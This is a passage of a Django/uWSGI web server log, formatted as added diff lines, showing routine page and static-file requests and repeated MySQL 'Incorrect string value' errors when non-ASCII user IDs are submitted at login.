+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 629/750] 219.228.146.253 () {48 vars in 1010 bytes} [Thu Jan 14 07:59:19 2021] POST /login/ => generated 209926 bytes in 123 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /
+[pid: 2069|app: 0|req: 630/751] 219.228.146.246 () {36 vars in 677 bytes} [Thu Jan 14 08:01:16 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 2069|app: 0|req: 631/752] 219.228.146.246 () {36 vars in 678 bytes} [Thu Jan 14 08:01:19 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 632/753] 219.228.146.246 () {36 vars in 688 bytes} [Thu Jan 14 08:01:54 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 633/754] 219.228.146.246 () {36 vars in 690 bytes} [Thu Jan 14 08:01:55 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/755] 219.228.146.246 () {38 vars in 785 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/756] 219.228.146.246 () {38 vars in 789 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/757] 219.228.146.246 () {38 vars in 807 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/758] 219.228.146.246 () {38 vars in 787 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/759] 219.228.146.246 () {38 vars in 793 bytes} [Thu Jan 14 08:01:55 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/760] 219.228.146.246 () {38 vars in 766 bytes} [Thu Jan 14 08:01:55 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/761] 219.228.146.246 () {38 vars in 764 bytes} [Thu Jan 14 08:01:55 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/762] 219.228.146.246 () {38 vars in 782 bytes} [Thu Jan 14 08:01:55 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/763] 219.228.146.246 () {38 vars in 780 bytes} [Thu Jan 14 08:01:56 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/764] 219.228.146.246 () {38 vars in 773 bytes} [Thu Jan 14 08:01:56 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/765] 219.228.146.246 () {38 vars in 838 bytes} [Thu Jan 14 08:01:58 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 634/766] 219.228.146.246 () {48 vars in 983 bytes} [Thu Jan 14 08:02:35 2021] POST /login/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 635/767] 219.228.146.246 () {40 vars in 868 bytes} [Thu Jan 14 08:02:36 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 636/768] 219.228.146.246 () {40 vars in 870 bytes} [Thu Jan 14 08:02:36 2021] GET /home/ => generated 7488 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 637/769] 114.87.230.234 () {38 vars in 921 bytes} [Thu Jan 14 08:03:23 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/770] 114.87.230.234 () {40 vars in 959 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/771] 114.87.230.234 () {40 vars in 983 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/772] 114.87.230.234 () {40 vars in 963 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/773] 114.87.230.234 () {40 vars in 969 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/774] 114.87.230.234 () {40 vars in 943 bytes} [Thu Jan 14 08:03:23 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/775] 114.87.230.234 () {40 vars in 965 bytes} [Thu Jan 14 08:03:23 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/776] 114.87.230.234 () {40 vars in 942 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/777] 114.87.230.234 () {40 vars in 958 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/778] 114.87.230.234 () {40 vars in 960 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/779] 114.87.230.234 () {40 vars in 950 bytes} [Thu Jan 14 08:03:24 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/780] 114.87.230.234 () {40 vars in 1027 bytes} [Thu Jan 14 08:03:26 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/781] 114.87.230.234 () {40 vars in 1033 bytes} [Thu Jan 14 08:03:26 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/782] 114.87.230.234 () {40 vars in 1001 bytes} [Thu Jan 14 08:03:26 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 638/783] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:03:47 2021] POST /login/ => generated 209897 bytes in 96 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 639/784] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:03:52 2021] POST /login/ => generated 209897 bytes in 132 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
